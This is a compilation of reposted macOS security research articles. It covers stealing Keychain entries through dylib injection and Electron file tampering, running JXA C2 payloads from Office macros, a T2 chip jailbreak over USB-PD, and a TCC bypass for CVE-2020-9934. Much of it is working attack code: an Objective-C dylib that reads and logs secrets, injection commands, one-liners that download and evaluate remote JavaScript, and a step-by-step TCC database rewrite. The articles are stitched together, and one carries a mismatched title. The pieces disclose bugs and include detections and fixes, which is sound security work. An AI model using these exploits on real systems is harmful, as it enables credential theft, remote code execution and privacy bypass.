Stealing macOS apps’ Keychain entries

Stealing macOS apps' Keychain entries

Original text by @WOJCIECH REGUŁA

Storing secrets on the macOS is a big challenge and can be done in multiple insecure ways. I tested many mac apps during bug bounty assessments and observed that developers tend to place secrets in preferences or even hidden flat files. The problem with that approach is that any non-sandboxed application running with typical permissions can access the confidential data.

For example, Signal on macOS stores a key that encrypts all your messages database in ~/Library/Application Support/Signal/config.json.

Signal encryption key

macOS Keychain

Apple tells us that “The keychain is the best place to store small secrets, like passwords and cryptographic keys”. Keychain is really powerful mechanism allowing developers to define access control lists (ACL) to restrict access to the entries. Applications can be signed with keychain-group entitlements in order to access shared between other apps secrets. The following Objective-C code will save a confidential value in the Keychain:

bool saveEntry() {
    OSStatus res;
    CFStringRef keyLabel = CFSTR("MySecret");
    CFStringRef secret = CFSTR("<secret data...>");
    CFMutableDictionaryRef attrDict = CFDictionaryCreateMutable(NULL, 5, &kCFTypeDictionaryKeyCallBacks, NULL);
    CFDictionaryAddValue(attrDict, kSecAttrLabel, keyLabel);
    CFDictionaryAddValue(attrDict, kSecValueData, secret);
    CFDictionaryAddValue(attrDict, kSecClass, kSecClassGenericPassword);
    CFDictionaryAddValue(attrDict, kSecReturnData, kCFBooleanTrue);
    
    res = SecItemAdd(attrDict, NULL);
    if (res == errSecSuccess) {
        return true;
    }
    return false;
}

And when executed, you should see that the entry has been successfully added:

My secret

Stealing the entry – technique #1

The first technique is to verify if the application has been signed with the Hardened Runtime or Library Validation flag. Yes, the Keychain doesn’t detect code injections… So simply, use the following command:

$ codesign -d -vv /path/to/the/app
Executable=/path/to/the/app
Identifier=KeychainSaver
Format=Mach-O thin (x86_64)
CodeDirectory v=20200 size=653 flags=0x0(none) hashes=13+5 location=embedded Signature size=4755
Authority=Apple Development: [REDACTED]
Authority=Apple Worldwide Developer Relations Certification Authority
Authority=Apple Root CA
Signed Time=29 Oct 2020 at 19:40:01
Info.plist=not bound
TeamIdentifier=[REDACTED]
Runtime Version=10.15.6
Sealed Resources=none
Internal requirements count=1 size=192

If the flags are 0x0 and there is no __RESTRICT Mach-O segment (that segment is really rare), you can simply inject a malicious dylib to the app’s main executable. Create an exploit.m file with the following contents:

#import <Foundation/Foundation.h>

__attribute__((constructor)) static void pwn(int argc, const char **argv) {
    NSLog(@"[+] Dylib injected");

    OSStatus res;
    CFTypeRef entryRef;

    CFStringRef keyLabel = CFSTR("MySecret");
    CFMutableDictionaryRef attrDict = CFDictionaryCreateMutable(NULL, 4, &kCFTypeDictionaryKeyCallBacks, NULL);
    CFDictionaryAddValue(attrDict, kSecAttrLabel, keyLabel);
    CFDictionaryAddValue(attrDict, kSecClass, kSecClassGenericPassword);
    CFDictionaryAddValue(attrDict, kSecReturnData, kCFBooleanTrue);

    res = SecItemCopyMatching(attrDict, (CFTypeRef*)&entryRef);
    if (res == errSecSuccess) {
        NSData *resultData = (__bridge NSData *)entryRef;
        NSString *entry = [[NSString alloc] initWithData: resultData encoding: NSUTF8StringEncoding];
        NSLog(@"[+] Secret stolen: %@", entry);
        
    }
    exit(0);
}

Compile it:

gcc -dynamiclib exploit.m -o exploit.dylib -framework Foundation -framework Security

And inject:

$ DYLD_INSERT_LIBRARIES=./exploit.dylib ./KeychainSaver
2020-10-30 19:33:46.600 KeychainSaver [+] Dylib injected
2020-10-30 19:33:46.628 KeychainSaver [+] Secret stolen: <secret data…>

Stealing the entry – technique #2

What if the executable has been signed with the Hardened Runtime? The bypass is similar to what I showed you in the XPC exploitation series. Grab an old version of the analyzed binary that was signed without the Hardened Runtime and inject the dylib into it. Keychain will not verify the binary’s version and will give you the secret.

Proposed fix for developers – create a Keychain Access Group and move the secrets there. As the old version of the binary wouldn’t be signed with that keychain group entitlement, it wouldn’t be able to get that secret. See docs.

Stealing the entry – technique #3

Keep in mind that the com.apple.security.disable-library-validation will allow you to inject a malicious dynamic library if the Hardened Runtime is set.

Stealing the entry – technique #4

As Jeff Johnson proved in his article, TCC only superficially checks the code signature of the app. The same problem exists in the Keychain. Even if the signature of the whole bundle is invalid, the Keychain will only verify if the main executable has not been tampered with. Let’s take one of the Electron applications installed on your device. I’m pretty sure that you have at least one installed (Microsoft Teams, Signal, Visual Studio Code, Slack, Discord, etc.). As it was proved many times (12) Electron apps cannot store your secrets securely.

This is another example of why this is true… Even if you sign Electron with the Hardened Runtime, the malicious application may change JavaScript files containing the actual code. Let’s take a look at Github Desktop.app. It stores the user’s session secret in the Keychain:

Github Desktop keychain entry

And it is validly signed:

$ codesign -d --verify -v /Applications/GitHub\ Desktop.app
/Applications/GitHub Desktop.app: valid on disk
/Applications/GitHub Desktop.app: satisfies its Designated Requirement

Next, change one of the JS files and verify the signature:

$ echo "/* test */" >> /Applications/GitHub\ Desktop.app/Contents/Resources/app/ask-pass.js
$ codesign -d --verify -v /Applications/GitHub\ Desktop.app
/Applications/GitHub\ Desktop.app: a sealed resource is missing or invalid
file modified: /Applications/GitHub\ Desktop.app/Contents/Resources/app/ask-pass.js

You can see that the signature is broken, but the Github will launch normally and load the secret saved in the Keychain:

Github Desktop loads entry from the Keychain

To prevent modifications, Electron implemented a mechanism called asar-integrity. It calculates a SHA512 hash and stores it in the Info.plist file. The problem is that it doesn’t stop the injections. If the main executable has not been signed with the Hardened Runtime or Kill flag and doesn’t contain restricted entitlements, you can simply modify the asar file, calculate a new checksum and update the Info.plist file. If these flags or entitlements are set, you can always use the ELECTRON_RUN_AS_NODE variable and again – execute code in the main executable context. So, it allows stealing the Keychain entries.

Summary

As I showed you in this post, secure secrets storage in the Keychain is really hard to achieve. There are multiple ways to bypass the access control mechanism as the code signature check of the requesting executables is done superficially.

The biggest problem is in Electron apps that just cannot store the secrets in the Keychain securely. Keep in mind that any framework that stores the actual code outside of the main executable may be tricked into loading malicious code.

If you know any other cool Keychain bypass techniques, please contact me. I’d be happy to update this post. 😉

Running JXA Payloads from macOS Office Macros

Running JXA Payloads from macOS Office Macros

Original text by Cedric Owens

Despite being quite antiquated, MS Office macros continue to be used by red teams (and attackers) due to the fact that they are easy to craft and they still work (and on the macOS side of the house, they often go undetected without building custom content). I have written MS Office macros for a couple different macOS C2 tools in the past…and in both I used python as the means of running the C2 payload:

With the landscape starting to shift in the macOS arena to moving away from python-based offensive tooling, I thought I would take a look at how to write macros for macOS without using python. Below I walk through that process.

I tried a few things to see what would and would not execute in the macOS app sandbox (where anything spawned by an MS Office macro is executed). I found that several utilities I wanted to use were not able to execute in the sandbox (I tested the items below from VBA execution using MacScript (“do shell script ….”)):

  • I tried using osascript to launch a JXA javascript file: osascript -l JavaScript -e “eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString(‘[url_to_jxa_js_file]’)),$.NSUTF8StringEncoding)));” — → osascript is permitted in the app sandbox, but not the -l JavaScript option during my testing
  • I tried building Objective C code on the fly, compiling, and executing via the command line: echo “#import <Foundation/Foundation.h>\n#import <AppKit/AppKit.h>\n#import <OSAKit/OSAKit.h>\n#include <pthread.h>\n#include <assert.h>\n\nint main(int argc, const char * argv[]) {\n\t@autoreleasepool {\n\t\tNSString *encString = @\”eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString(‘[JXApayloadURL]‘)),$.NSUTF8StringEncoding)));\»;\n\t\tOSALanguage *lang = [OSALanguage languageForName:@\”JavaScript\”];\n\t\tOSAScript *script = [[OSAScript alloc] initWithSource:encString language:lang];\n\t\tNSDictionary *__autoreleasing compileError;\n\t\tNSDictionary *__autoreleasing runError;\n\t\t[script compileAndReturnError:&compileError];\n\t\tNSAppleEventDescriptor* res = [script executeAndReturnError:&runError];\n\t\tBOOL didSucceed = (res != nil);\n\t}\n\treturn 0;\n}” >> jxa.m && clang -fmodules jxa.m -o jxa && ./jxa — → clang (as well as gcc) were not permitted to be executed in the sandbox during my testing
  • Next I went very simple and just tried to invoke curl to download a hosted JXA .js payload and to invoke that payload via osascript…THAT DID WORK:
Image for post
JXA payload downloaded and run
Image for post
Mythic payload executed

Note: There is nothing really advanced or complex in the code above. Since these command line binaries were allowed in the app Sandbox, this made for an easy way to perform this action without using python.

Here is my github repo with the macro generator code to produce VBA code with content similar to above:

https://github.com/cedowens/Mythic-Macro-Generator

In my testing I used Mythic’s apfell http JXA .js payloads:

https://github.com/its-a-feature/Mythic

What is neat about Mythic is even though this method will launch the Mythic agent inside of the app sandbox, Mythic is still able to execute some functions outside of the sandbox due to how it is invoking ObjC calls to perform those functions.

Detection

Since my macro generator produces code that relies on the command line, detections are pretty straightforward. I ran Patrick Wardle’s ProcessMonitor tool (which uses the Endpoint Security Framework) in order to capture events when I launched the macro and connected to Mythic. Here is a screenshot of the capture:

Image for post

In summary, parent-child detections can be used to detect this macro:

  • Office Product (ex: Microsoft Word.app) → /bin/sh
  • Office Product (ex: Microsoft Word.app) → /bin/bash
  • Office Product (ex: Microsoft Word.app) → /usr/bin/curl

I recommend blue teams roll out the detections above, as there should be little to no valid activity stemming from the above parent-child relationships.

Plug’nPwn — Connect to Jailbreak

Original text by T2

Plug'nPwn - Connect to Jailbreak
State of the World: checkm8checkra1n and the T2
For those just joining us, news broke last week about the jailbreaking of Apple’s T2 security processor in recent Macs. If you haven’t read it yet, you can catch up on the story here, and try this out yourself at home using the latest build of checkra1n. So far we’ve stated that you must put the computer into DFU before you can run checkra1n to jailbreak the T2 and that remains true, however today we are introducing a demo of replacing a target Mac’s EFI and releasing details on the T2 debug interface.
A Monkey by any Other Name
In order to build their products unlike app developers Apple has to debug the core operating system. This is how firmware, the kernel and the debugger itself are built and debugged. From the earliest days of the iPod, Apple has built specialized debug probes for building their products. These devices are leaked from Apple headquarters and their factories and have traditionally had monkey related names such as the “Kong”, “Kanzi” and “Chimp”. They work by allowing access to special debug pins of the CPU, (which for ARM devices is called Serial Wire Debug or SWD), as well as other chips via JTAG and UART. JTAG is a powerful protocol allowing direct access to the components of a device and access generally provides the ability to circumvent most security measures. Apple has even spoken about their debug capabilities in a BlackHat talk describing the security measures in effect. Apple has even deployed versions of these to their retail locations allowing for repair of their iPads and Macs.
The Bonobo in the Myst
Another hardware hacker and security researcher Ramtin Amin did work last year to create an effective clone of the Kanzi cable. This combined with the checkm8 vulnerability from axi0mX allows iPhones 5s — X to be debugged.
The USB port on the Mac
One of the interesting questions is how does the Macs share a USB port with both the Intel CPU (macOS) and the T2 (bridgeOS) for DFU.  These are essentially separate computers inside of the case sharing the same pins.  Schematics of the MacBook leaked from Apple’s vendors (a quick search with a part number and “schematic”), and analysis of the USB-C firmware update payload show that there is a component on each port which is tasked with both multiplexing (allowing the port to be shared) as well as terminating USB power delivery (USB-PD) for the charging of the MacBook or connected devices.  Further analysis shows that this port is shared between the following:

The Thunderbolt controller which allows the port to be used by macOS as Thunderbolt, USB3 or DisplayPort
The T2 USB host for DFU recovery
Various UART serial lines
The debug pins of the T2
The debug pins of the Intel CPU for debugging EFI and the kernel of macOS

Like the above documentation related to the iPhone, the debug lanes of a Mac are only available if enabled via the T2.  Prior to the checkm8 bug this required a specially signed payload from Apple, meaning that Apple has a skeleton key to debug any device including production machines.  Thanks to checkm8, any T2 can be demoted, and the debug functionality can be enabled.  Unfortunately Intel has placed large amounts of information about the Thunderbolt controllers and protocol under NDA, meaning that it has not been properly researched leading to a string of vulnerabilities over the years.
The USB-C Plug and USB-PD

Given that the USB-C port on the Mac does many things, it is necessary to indicate to the multiplexer what device inside the Mac you’d like to connect too.  The USB-C port specification provides pins for this exact purpose (CC1/CC2) as well as detecting the orientation of the cable allowing for it to be reversible.  On top of the CC pins runs another low speed protocol called USB-PD or USB power delivery.  It is primarily used to negotiate power requirements between chargers(sources) and devices (sinks).  USB-PD also allows for arbitrary packets of information in what are called “Vendor Defined Messages” or VDMs.

Apple’s USB-PD Extensions
The VDM allows Apple to trigger actions and specify the target of a USB-C connection.  We have discovered USB-PD payloads that cause the T2 to be rebooted and for the T2 to be held into a DFU state.  Putting these two actions together, we can cause the T2 to restart ready to be jailbroken by checkra1n without any user interaction.  While we haven’t tested a Apple Serial Number Reader, we suspect it works in a similar fashion, allowing the devices ECID and Serial Number to be read from the T2’s DFU reliably.  The Mac also speaks USB-PD to other devices, such as when an iPad Pro is connected in DFU mode.  
Apple needs to document the entire set of VDM messages used in their products so that consumers can understand the security risks.  The set of commands we issue are unauthenticated, and even if they were they were undocumented and thus un-reviewed.  Apple could have prevented this scenario by requiring that some physical attestation occurs during these VDMs such as holding down the power button at the same time.

Putting it Together
Taking all this information into account, we can string it together to reflect a real world attack.  By creating a specialized device about the size of a power charger, we can place a T2 into DFU mode, run checkra1n, replace the EFI and upload a key logger to capture all keys.  This is possible even though macOS is un-altered (the logo at boot is for effect but need not be done).  This is because in Mac portables the keyboard is directly connected to the T2 and passed through to macOS.

VIDEO DEMO
PlugNPwn is the entry into DFU directly from connecting a cable to the DFU port (if it doesn’t show, it may be your AdBlock: https://youtu.be/LRoTr0HQP1U)

PlugN’Pwn Automatic Jailbreak
In the next video we use checkra1n to modify the MacEFI payload for the Intel processor (again, AdBlock may cause it not to show https://youtu.be/uDSPlpEP-T0)

USB-C Debug Probe

In order to facilitate further research on the topic of USB-PD security, and to allow users at home to perform similar experiments we are pleased to announce pre-ordereing of our USB-PD screamer.  It allows a computer to directly «speak» USB-PD to a target device.  Get more info here:

[PRE-SALE] USB-PD Screamer

[PRE-SALE] USB-PD Screamer

$49.99

This miniature USB-to-Power Delivery adapter lets you experiment with USB Power Deliver protocol and discover hidden functionality in various Type-C devices.

Capabilities you might discover include but are not limited to serial ports, debug ports (SWD, JTAG, etc.), automatic restart, automatic entry to firmware update boot-loader.

Tested to work with Apple Type-C devices such as iPad Pro and MacBook (T1 and T2) to expose all functionality listed above (SWD does not work on iPad because no downgrade is available).

WARNING! This probe is NOT an SWD/Serial probe by itself. It only allows you to send needed PD packets to mux SWD/Serial out and exposes it on the test pads. If you want to use SWD/Serial, you WILL need another SWD/Serial probe/adapter upstream connected to the test pads.

ABSOLUTELY NOT for experiments with 9/15/20v or anything other than 5v.

Only for arbitrary PD messages.

Dimensions: 10x15mm (excluding type-c plug)

Connectivity: USB to control custom PD messages, test points for USB-Top, USB-Bottom, and SBU lines for connection to upstream devices to utilize the exposed functionality.

CVE-2020–9934: Bypassing the macOS Transparency, Consent, and Control (TCC) Framework for unauthorized access to sensitive user data

Stealing macOS apps' Keychain entries

Original text by Matt Shockley

Background

The Transparency, Consent, and Control (TCC) Framework is an Apple subsystem which denies installed applications access to ‘sensitive’ user data without explicit permission from the user (generally in the form of a pop-up message). While TCC also runs on iOS, this bug is restricted to the macOS variant. To learn more about how TCC works, especially with Catalina, I recommend reading this article.

Image for post
TCC prompt when opening Spotify for the first time

If an application attempts to access files in a directory protected by TCC without user authorization, the file operation will fail. TCC stores these user-level entitlements in a SQLite3 database on disk at $HOME/Library/Application Support/com.apple.TCC/TCC.db Apple uses a dedicated daemon, tccd, for each logged-in user (and one system level daemon) to handle TCC requests. These daemons sit idle until they receive an access request from the OS for an application attempting to access protected data.

Image for post
listing currently running TCC daemons

When the daemon receives such a request, it first checks the TCC database to see if the user has either allowed or denied access to the requested data before from this application. If so, TCC uses the previous decision; otherwise it prompts the user to choose whether to allow the application access or not. Thus, if an application can gain write access to this TCC database, it can not only give itself all TCC entitlements, but also do it without ever prompting the user.

The Bug

Obviously being able to write directly to the database completely defeats the purpose of TCC, so Apple protects this database itself with TCC and System Integrity Protection (SIP). Even a program running as root cannot modify this database unless it has the com.apple.private.tcc.manager and com.apple.rootless.storage.TCC entitlements. However, the database is still technically owned and readable/writeable by the currently running user, so as long as we can find a program with those entitlements, we can control the database.

Image for post
TCC database permissions

Since the TCC daemon is directly responsible for reading and writing to the TCC database, it’s a prime candidate!

Image for post
tccd entitlements

Immediately after opening the TCC daemon in Ghidra and looking for code that was related to handling database operations, I noticed something that didn’t seem right.

Image for post
ghidra decompiler view of database opening code

Essentially, when the TCC daemon attempts to open the database, the program tries to directly open (or create if not already existing) the SQLite3 database at $HOME/Library/Application Support/com.apple.TCC/TCC.db While this seems inconspicuous at first, it becomes more interesting when you realize that you can control the location that the TCC daemon reads and writes to if you can control what the $HOME environment variable contains.

Image for post
tricking TCC to use a non-SIP protected directory for the database

I initially dismissed this as a fun trick as the actual TCC daemon running via launchd completely ignores this database and is the only daemon the OS communicates with when doing authorization events. However, a few days later I stumbled across this Stack Exchange post and realized that since the TCC daemon is running via launchd within the current user’s domain, I could also control all environment variables passed to it when launched! Thus, I could set the $HOME environment variable in launchctl to point to a directory I control, restart the TCC daemon, and then directly modify the TCC database to give myself every TCC entitlement available without ever prompting the end user. As this doesn’t actually modify the SIP-protected TCC database, this bug also has the added benefit of completely resetting TCC to its previous state once $HOME is unset in launchctl and the daemon is restarted.

Proof of Concept

The POC for this bug is actually pretty simple and requires no code to be written.

# reset database just in case (no cheating!)
$> tccutil reset All# mimic TCC's directory structure from ~/Library
$> mkdir -p "/tmp/tccbypass/Library/Application Support/com.apple.TCC"# cd into the new directory
$> cd "/tmp/tccbypass/Library/Application Support/com.apple.TCC/" # set launchd $HOME to this temporary directory
$> launchctl setenv HOME /tmp/tccbypass# restart the TCC daemon
$> launchctl stop com.apple.tccd && launchctl start com.apple.tccd# print out contents of TCC database and then give Terminal access to Documents
$> sqlite3 TCC.db .dump
$> sqlite3 TCC.db "INSERT INTO access
VALUES('kTCCServiceSystemPolicyDocumentsFolder',
'com.apple.Terminal', 0, 1, 1,
X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',
NULL,
NULL,
'UNUSED',
NULL,
NULL,
1333333333333337);"# list Documents directory without prompting the end user
$> ls ~/Documents

I also have a full Swift (because why not) writeup available on Github.

Image for post
swift POC example output

Timeline

  • 26 Feb 2020: Issue reported to the Apple Product Security Team
  • 27 Feb 2020: Apple reviews report, begins investigation into issue
  • 23 Apr 2020: Apple confirms the bug will be fixed in a future update
  • 15 Jul 2020: Apple releases patch for the bug (Security Update 2020–004)

Contact

I’m trying out this Twitter Infosec thing, so reach out to me there!